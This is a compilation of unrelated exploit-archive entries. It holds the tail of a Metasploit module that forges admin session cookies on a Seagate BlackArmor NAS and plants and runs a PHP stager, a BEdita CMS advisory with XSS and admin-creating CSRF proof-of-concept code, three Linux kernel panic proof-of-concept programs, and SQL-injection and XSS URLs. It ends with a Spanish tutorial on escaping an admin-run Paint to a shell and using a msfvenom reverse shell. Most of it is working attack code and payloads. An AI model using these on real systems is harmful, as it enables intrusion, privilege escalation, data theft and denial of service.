        OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
      ])
  end

  #
  # Write a string value to a serialized PHP object without deserializing it first.
  # If the value exists it will be updated.
  #
  def set_string(php_object, name, value)
    prefix = "s:#{name.length}:\"#{name}\";s:"
    if php_object.include?(prefix)
      # the value already exists in the php blob, so update it.
      return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
    end

    # the value doesn't exist in the php blob, so create it.
    count = php_object.split(':')[1].to_i + 1
    php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
  end

  #
  # Findez ze holez!
  #
  def check
    begin
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        }
      )

      if res && res.code == 200
        headers = res.to_s

        # validate headers
        if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
          # and make sure that the body contains the title we'd expect
          if res.body.include?('Login to BlackArmor')
            return Exploit::CheckCode::Appears
          end
        end
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      # something went wrong, assume safe.
    end

    Exploit::CheckCode::Safe
  end

  #
  # Executez ze sploitz!
  #
  def exploit

    # Step 1 - Establish a session with the target which will give us a PHP object we can
    # work with.
    begin
      print_status("Establishing session with target ...")
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri),
        'method' => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        }
      })

      if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
        cookie_value = $1.strip
      else
        fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
    end

    # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
    # then update it so that it's an admin session before re-encrypting
    print_status("Upgrading session to administrator ...")
    php_object = decode_cookie(cookie_value)
    vprint_status("PHP Object: #{php_object}")

    admin_php_object = set_string(php_object, 'is_admin', 'yes')
    admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
    vprint_status("Admin PHP object: #{admin_php_object}")

    admin_cookie_value = encode_cookie(admin_php_object)

    # Step 3 - Extract the current host configuration so that we don't lose it.
    host_config = nil

    # This time value needs to be consistent across calls
    config_time = ::Time.now.to_i

    begin
      print_status("Extracting existing host configuration ...")
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'   => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
        'vars_get' => {
          '_'      => config_time
        }
      )

      if res && res.code == 200
        res.body.split("\r\n").each do |l|
          if l.include?('general_setup')
            host_config = l
            break
          end
        end
      else
        fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
    end

    print_good("Host configuration extracted.")
    vprint_status("Host configuration: #{host_config}")

    # Step 4 - replace the host device description with a custom payload that can
    # be used for LFI. We have to keep the payload small because of size limitations
    # and we can't put anything in with '$' in it. So we need to make a simple install
    # payload which will write a required payload to disk that can be executes directly
    # as the last part of the payload. This will also be self-deleting.
    param_id = rand_text_alphanumeric(3)

    # There are no files on the target file system that start with an underscore
    # so to allow for a small file size that doesn't collide with an existing file
    # we'll just prefix it with an underscore.
    payload_file = "_#{rand_text_alphanumeric(3)}.php"

    installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
    stager = Rex::Text.encode_base64(installer)
    stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
    vprint_status("Stager: #{stager}")

    # Butcher the XML directly rather than attempting to use REXML. The target XML
    # parser is way to simple/flaky to deal with the proper stuff that REXML
    # spits out.
    desc_start = host_config.index('" description="') + 15
    desc_end = host_config.index('"', desc_start)
    xml_payload = host_config[0, desc_start] +
                  stager + host_config[desc_end, host_config.length]
    vprint_status(xml_payload)

    # Step 5 - set the host description to the stager so that it is written to disk
    print_status("Uploading stager ...")
    begin
      res = send_request_cgi(
        'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
        'method'          => 'POST',
        'headers'         => {
          'Accept'        => 'text/html'
        },
        'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
        'vars_get'        => {
          '_'             => config_time
        },
        'vars_post'       => {
          'general_setup' => xml_payload
        }
      )

      unless res && res.code == 200
        fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
    end

    print_good("Stager uploaded.")

    # Step 6 - Invoke the stage, passing in a self-deleting php script body.
    print_status("Executing stager ...")
    payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
    payload_cookie_value = encode_cookie(payload_php_object)
    self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
    errored = false

    begin
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri),
        'method'   => 'POST',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'    => "#{datastore['COOKIEID']}=#{payload_cookie_value}",
        'vars_post' => {
          param_id  => Rex::Text.encode_base64(self_deleting_payload)
        }
      )

      if res && res.code == 200
        print_good("Stager execution succeeded, payload ready for execution.")
      else
        print_error("Stager execution failed (invalid result).")
        errored = true
      end
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
      print_error("Stager execution failed (unable to establish connection).")
      errored = true
    end

    # Step 7 - try to restore the previous configuration, allowing exceptions
    # to bubble up given that we're at the end. This step is important because
    # we don't want to leave a trail of junk on disk at the end.
    print_status("Restoring host config ...")
    res = send_request_cgi(
      'uri'             => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
      'method'          => 'POST',
      'headers'         => {
        'Accept'        => 'text/html'
      },
      'cookie'          => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
      'vars_get'        => {
        '_'             => config_time
      },
      'vars_post'       => {
        'general_setup' => host_config
      }
    )

    # Step 8 - invoke the installed payload, but only if all went to plan.
    unless errored
      print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri, payload_file),
        'method'   => 'GET',
        'headers'  => {
          'Accept' => 'text/html'
        },
        'cookie'   => "#{datastore['COOKIEID']}=#{payload_cookie_value}"
      )
    end
  end

  #
  # Take a CodeIgnitor cookie and pull out the PHP object using the XOR
  # key that we've been given.
  #
  def decode_cookie(cookie_content)
    cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content))
    pass = xor(cookie_value, datastore['XORKEY'])
    result = ''

    (0...pass.length).step(2).each do |i|
      result << (pass[i].ord ^ pass[i + 1].ord).chr
    end

    result
  end

  #
  # Take a serialised PHP object cookie value and encode it so that
  # CodeIgniter thinks it's legit.
  #
  def encode_cookie(cookie_value)
    rand = Rex::Text.sha1(rand_text_alphanumeric(40))

    block  = ''

    (0...cookie_value.length).each do |i|
      block << rand[i % rand.length]
      block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr
    end

    cookie_value = xor(block, datastore['XORKEY'])
    cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
    vprint_status("Cookie value: #{cookie_value}")

    cookie_value
  end

  #
  # XOR a value against a key. The key is cycled.
  #
  def xor(string, key)
    result = ''

    string.bytes.zip(key.bytes.cycle).each do |s, k|
      result << (s ^ k)
    end

    result
  end

  #
  # Simple XML substitution because the target XML handler isn't really
  # full blown or smart.
  #
  def xml_encode(str)
    str.gsub(/</, '<').gsub(/>/, '>')
  end

end
HireHackking 
BEdita CMS - XSS & CSRF Vulnerability in Version 3.5.0

----------------------------------------------------------------

Product Information:

Software: BEdita CMS
Tested Version: 3.5.0, released 19.1.2015
Vulnerability Type: Cross-Site Scripting (CWE-79) & Cross-Site Request Forgery, CSRF (CWE-352)
Download link: http://www.bedita.com/download-bedita
Description: A software to create, manage content and organize it with semantic rules. (copied from http://www.bedita.com/what-is-bedita)

----------------------------------------------------------------

Issues:

1) XSS in newsletter mail group creation page.
2) CSRF in user creation page.

----------------------------------------------------------------

Vulnerability description:

1) XSS in newsletter mail group creation page

When an authenticated user of BEdita CMS is creating a newsletter mail group, the following POST request is sent to the server:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 523
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[MailGroup][id]=&data[MailGroup][group_name]=<script>alert(0)</script>&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user], 

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user], 

you+have+been+unsubscribed+from "[$title]"

The parameter data[MailGroup][group_name] is vulnerable to XSS.

2) CSRF in user creation page

When an authenticated administrative user of BEdita CMS is creating an user, the following POST request is sent to the server:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 339
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/viewUser
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[User][auth_type]=bedita&data[User][userid]=csrfadmin99&data[User][auth_params][userid]=&pwd=1qazXSW@&data[User][passwd]=1qazXSW@&data[User][realname]=csrfadmin99&data[User][email]=csrfadmin99@admin.com&data[User][valid]=1&groups=&data[groups][administrator]=on

By executing the following Proof-of-Concept, a new user called "csrfadmin99" will be created with the password "1qazXSW@".

<html>
<body>
<form action="http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser" method="POST">
<input type="hidden" name="data[User][auth_type]" value="bedita" />
<input type="hidden" name="data[User][userid]" value="csrfadmin99" />
<input type="hidden" name="pwd" value="1qazXSW@" />
<input type="hidden" name="data[User][passwd]" value="1qazXSW@" />
<input type="hidden" name="data[User][realname]" value="csrfadmin99" />
<input type="hidden" name="data[User][email]" value="csrfadmin99@admin.com" />
<input type="hidden" name="data[User][valid]" value="1" />
<input type="hidden" name="data[groups][administrator]" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

----------------------------------------------------------------

Impact:

1) An attacker is able to leverage on the XSS vulnerability to exploit users of BEdita. An example would be to Inject malicious JavaScript code in order to use attacking tools like BeEF.
2) An attacker is able to create an user account with administrator privilege.

----------------------------------------------------------------

Solution:

Update to the latest version, which is 3.5.1, see https://groups.google.com/forum/?fromgroups#!topic/bedita/SOYrl5C-YRg

----------------------------------------------------------------

Timeline:

Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 11.2.2015
Fix by vendor 19.2.2015
Public Advisory: 1.3.2015

----------------------------------------------------------------

References:
https://github.com/bedita/bedita/issues/591
https://github.com/bedita/bedita/issues/597

----------------------------------------------------------------
HireHackking 
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-9322_poc.c
 * 
 * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
 * properly handle faults associated with the Stack Segment (SS) segment
 * register, which allows local users to gain privileges by triggering an IRET
 * instruction that leads to access to a GS Base address from the wrong space.
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * 
 * I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
 * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
 * 
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c  -lpthread
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
 
  // Only works on x86_64 platform
 #ifdef __x86_64__
 
/* -----------------------   Includes ----------------------------*/
#define _GNU_SOURCE
#include <stdio.h> 
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <sys/time.h>
#include <inttypes.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/user.h>



/* -----------------------   definitions ----------------------------*/


#define TARGET_KERNEL_MIN "3.0.0"
#define TARGET_KERNEL_MAX "3.17.4"
#define EXPLOIT_NAME "cve-2014-9322"
#define EXPLOIT_TYPE DOS


#define FALSE_SS_BASE  0x10000UL
#define MAP_SIZE    0x10000


/* -----------------------   Global variables ----------------------------*/


struct user_desc new_stack_segment;


/* -----------------------   functions ----------------------------*/


/**
 * Creates a new segment in Local Descriptor Table
 */
static bool add_ldt(struct user_desc *desc, const char *name)
{
  if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0) 
  {
    return true;
  } 
  else 
  {
    printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
    printf("modify_ldt failed, %s\n", strerror(errno));
    return false;
  }
}


int FLAG = 0;

void * segManipulatorThread(void * none)
{
  new_stack_segment.entry_number    = 0x12;
  new_stack_segment.base_addr       = 0x10000;
  new_stack_segment.limit           = 0xffff;
  new_stack_segment.seg_32bit       = 1;
  new_stack_segment.contents        = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
  new_stack_segment.read_exec_only  = 0;
  new_stack_segment.limit_in_pages  = 0;
  new_stack_segment.seg_not_present = 0;
  new_stack_segment.useable         = 0;
  new_stack_segment.lm = 0;
  
  // Create a new stack segment
  add_ldt(&new_stack_segment, "newSS");
  
  // Wait for main thread to use new stack segment
  sleep(3);  

  // Invalidate stack segment 
  new_stack_segment.seg_not_present = 1;
  add_ldt(&new_stack_segment, "newSS disable");
  FLAG = 1;
  sleep(15);
  
  return NULL;
}

/**
 * DOS poc for cve_2014_9322 vulnerability
 */
int main()
{

  pthread_t thread1;
  uint8_t *code;
  
  printf("[cve_2014_9322]: Preparing to exploit.\n");
  
  // map area for false SS
  code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
  if (code != (uint8_t *) FALSE_SS_BASE) 
  {
    fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
    return -1;
  }
   
    printf("[cve_2014_9322]:  Panic!\n");
  if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
  {
    perror("[cve_2014_9322 error]: pthread_create");
    return false;  
  }
  
  // Wait for segManipulatorThread to create new stack segment
  sleep(1);

    // Set  stack segment to newly created one in segManipulatorThread
  asm volatile ("mov %0, %%ss;"
    :        
    :"r" (0x97)
  );
  
  while(FLAG == 0){};
  sleep(4);

  return 0;
}


#endif // __x86_64__
HireHackking 
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-4943_poc.c
 * 
 * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure 
 * differences between an l2tp socket and an inet socket. 
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
 * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
 * If seems guys at immunuty found a way using race condition.
 *
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c  
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
 

 
/* -----------------------   Includes ----------------------------*/

#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>


/* -----------------------   Definitions ----------------------------*/

#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"



/* -----------------------   functions ----------------------------*/


/**
 * It is possible to modify several parts of socket object using IP options frop UDP setsockopt
 * For this POC, IP_OPTIONS is the easiest way to panic kernel
 */
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
  
 int udp_setsockopt(struct sock *sk, int level, int optname,
                    char __user *optval, unsigned int optlen)
 {
         if (level == SOL_UDP  ||  level == SOL_UDPLITE)
                 return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                           udp_push_pending_frames);
         return ip_setsockopt(sk, level, optname, optval, optlen);
 }
*/
  
  int ip_options = 0x1;
     
  if (setsockopt(tunnel_fd, SOL_IP,  IP_OPTIONS, &ip_options, 20) == -1) 
    {
        perror("setsockopt (IP_OPTIONS)");   
    }
}


/**
 * DOS poc for cve_2014_4943 vulnerability
 */
int main()
{

  int tunnel_fd;
  int tunnel_fd2;
  int udp_fd;

  printf("[cve_2014_4943]: Preparing to exploit.\n");

  /* Create first L2TP socket */
  tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  if (tunnel_fd < 0)
  {
    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
    return -1;
  }
  /* Create second L2TP socket */
  tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  if (tunnel_fd2 < 0)
  {
    perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
    return -1;
  }
  if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) 
  {
    perror("cannot create socket"); 
    return -1; 
  }
  
  /* Connect LT2P socket */
  struct sockaddr_pppol2tp sax;

  memset(&sax, 0, sizeof(sax));
  sax.sa_family = AF_PPPOX;
  sax.sa_protocol = PX_PROTO_OL2TP;
  sax.pppol2tp.fd = udp_fd;       /* fd of tunnel UDP socket */
  sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
  sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
  sax.pppol2tp.addr.sin_family = AF_INET;
  sax.pppol2tp.s_tunnel = 8;//tunnel_id;
  sax.pppol2tp.s_session = 0;     /* special case: mgmt socket */
  sax.pppol2tp.d_tunnel = 0;
  sax.pppol2tp.d_session = 0;     /* special case: mgmt socket */

  if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
  {
    perror("connect failed");
  }
  
  /* Connect LT2P socket */
  struct sockaddr_pppol2tp sax2;

  memset(&sax, 0, sizeof(sax2));
  sax2.sa_family = AF_PPPOX;
  sax2.sa_protocol = PX_PROTO_OL2TP;
  sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
  sax2.pppol2tp.s_session = 1;     
  sax2.pppol2tp.d_tunnel = 0;
  sax2.pppol2tp.d_session = 1;     

  if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
  {
    perror("connect failed");
  }
  
  
  /*
     * Entering critical part
     */
    printf("[cve_2014_4943]:  Panic!\n");
  
  //modifyUDPvalues(tunnel_fd);
  modifyUDPvalues(tunnel_fd2);

  
  // close opened socket  
  puts("\n [+] Closing sockets...");
  close(tunnel_fd);
  close(tunnel_fd2);
    
  exit(0);
}
HireHackking 
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-3631_poc.c
 * 
 * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 
 * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) 
 * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c  -lkeyutils 
 * 
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/


/* -----------------------   Includes ----------------------------*/

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <inttypes.h>
#include <keyutils.h>
#include <fcntl.h>


#define TARGET_KERNEL_MIN "3.13.0"
#define TARGET_KERNEL_MAX "3.16.2"
#define EXPLOIT_NAME "cve-2014-3631"
#define EXPLOIT_TYPE DOS


/* -----------------------   functions ----------------------------*/



/**
 * Poc for cve_2014_3631 vulnerability
 */
int main()
{
  key_serial_t currentKey = 0;
  key_serial_t topKey = 0;
  int i = 0;
  int fp;
  char kname[16]={0};
  char gc_delay[16] = {0};
  int delay  =0;
  
  printf("[cve_2014_3631]: Preparing to exploit.\n");

  // fetch garbage collector value..
  fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY);
  if(fp == -1)
  {
     printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
     delay = 300;
  }
  else
  {
    read(fp,gc_delay,sizeof(gc_delay-1));
    delay = atoi(gc_delay);
    close(fp);  
  }

  // Add top key
  topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING);
  if(topKey == -1)
  {
    printf("[cve_2014_3631 error]: keyring  fault\n");
    perror("add_key");
    return -1;
  }
  
  // Add 18 keys to top key
  for(i=0; i< 18; i++)
  {
    memset(kname,00,sizeof(kname));
    memcpy(kname,"Lvl2K_",strlen("Lvl2K_"));
    sprintf(kname+strlen("Lvl2K_"),"%d",i);
    currentKey = add_key("keyring",kname,NULL,0,topKey);
    if(currentKey == -1)
    {
      printf("[cve_2014_3631 error]: keyring  fault\n");
      perror("add_key");
      return -1;
    }
  } 
  
  /* Entering exploit critical code */
  printf("[cve_2014_3631]:  Exploit!\n");
  
  // Set timeout and wait for garbage collector
  keyctl_set_timeout(currentKey, 2);
  
  // Wait for garbage collector
  printf("[cve_2014_3631]: Exploit triggered, system will panic in  %d seconds..\n",delay);
  
  return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/50426/info

SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SjXjV 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--

http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5
HireHackking 
source: https://www.securityfocus.com/bid/50428/info

Plici is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/l1/p48-search.html[XSS]
HireHackking

Normalmente, estamos acostumbrados a escalar privilegios desde la consola de comandos, y de hecho, es así el 95 por ciento de las veces. Sin embargo, hay ciertas ocasiones en las que de forma gráfica, cuando instalamos o abrimos un programa, si se hace como administrador directamente sin pedirnos contraseña del mismo etc, es posible que tengamos la capacidad de escaparnos de la aplicación para poder ejecutarnos una cmd como el mismo usuario que esté ejecutando el proceso.

Vamos a ver un ejemplo usando el entorno vulnerable que te prepara el script de «tib3rius» y que podéis encontrar en su repositorio.

Índice:

  • Ejemplo de Explotación
  • Ejemplo real de esta explotación
  • Referencias

Ejemplo de Explotación

En este caso, en este entorno, el programa que al ejecutarlo, se ejecuta como el usuario administrador es el paint:

image 50

Nosotros hemos iniciado sesión en el equipo como el usuario «user», somos un usuario sin privilegios:

image 62

Volviendo al paint, al darle doble click y abrirlo, no nos pide nada, se abre sin más, porque está configurado para ello:

image 51

Sin embargo, podemos comprobar que lo está ejecutando el usuario administrador a través del siguiente comando:

tasklist /V | findstr <programa>

Tasklist muestra la lista de procesos que están actualmente en ejecución en el equipo. Con el argumento /V muestra una salida más detallada

Findstr simplemente es el equivalente al grep en sistemas Linux

image 52

Bien, pues sabiendo esto, nos volvemos al paint y lo que se suele hacer en estos casos es dirigirnos a alguna característica del programa donde nos podamos escapar del mismo. Lo más típico es intentar abrir el explorador de archivos, ya sea para seleccionar una ruta o abrir un archivo o lo que sea:

image 53
image 54

Con el explorador de archivos abierto, podemos abrirnos una cmd de la siguiente manera:

image 55
image 56

OJO, también podríamos escaparnos y abrirnos una powershell.exe haciendo «SHIFT + Click Derecho»:

image 57
image 58

Y de esta forma, también conseguimos escaparnos y ejecutar una cmd en el contexto de quien está ejecutando el paint, en este caso, admin. Esto ocurre ya que como el proceso padre está ejecutándose como administrador (paint), la cmd se ejecutará con los mismos privilegios al ser un proceso hijo. Desde el Process Explorer, se ve así:

2021 12 31 13 03

Por lo que no es una vulnerabilidad como tal de paint, sino que existe la mala configuración de que esta aplicación se ejecuta como administrador directamente.

Ahora, si somos «anti-interfaz-gráfica», pues simplemente podemos pasarnos un archivo «exe» generado con msfvenom para que nos ejecute una reverse shell:

  • Me pongo en escucha en el Kali:
image 59
  • Ejecuto el «exe» que he pasado al Windows, el cual me genera una reverse shell hacia el kali al puerto 4444:
image 60
image 61

De esta forma, habiéndonos aprovechado de una vulnerabilidad de forma gráfica, al final de todo, hemos conseguido escalar privilegios y obtener una shell como Administrador.

Ejemplo real de esta explotación

Hace no mucho (al menos a la hora de escribir este post), en agosto de 2021 salió una vulnerabilidad la cual permitía una escalada de privilegios usando dispositivos Razer. La escalada se realizaba prácticamente casi de la misma forma que se ha explicado en este post.

Básicamente, la idea básica consiste en que al conectar físicamente un dispositivo Razer, Windows automáticamente descargará e instalará el programa «Razer Synapse Software», este proceso lo realizará como el usuario SYSTEM (todo sin pedirnos permisos, lo hace automático). En el asistente de instalación, llega un momento en el que nos permite abrir el explorador de archivos para seleccionar la ruta donde queremos que se instale, en este punto simplemente ya hacemos lo que se ha explicado en este post.

Este es el tweet original de la vulnerabilidad, la cual contiene un video de la explotación:

Need local admin and have physical access?
– Plug a Razer mouse (or the dongle)
– Windows Update will download and execute RazerInstaller as SYSTEM
– Abuse elevated Explorer to open Powershell with Shift+Right click

Tried contacting @Razer, but no answers. So here's a freebie pic.twitter.com/xDkl87RCmz

— jonhat (@j0nh4t) August 21, 2021

Claro, esto literalmente permitía que cualquier persona con un dispositivo Razer y acceso físico a un equipo, tuviera la capacidad de escalar privilegios.

Para más información, aquí otras fuentes donde se habla en detalle de como funciona:

  • Razer bug lets you become a Windows 10 admin by plugging in a mouse
  • You Can Get Admin Privileges On Windows 10 With A Razer Mouse

Referencias

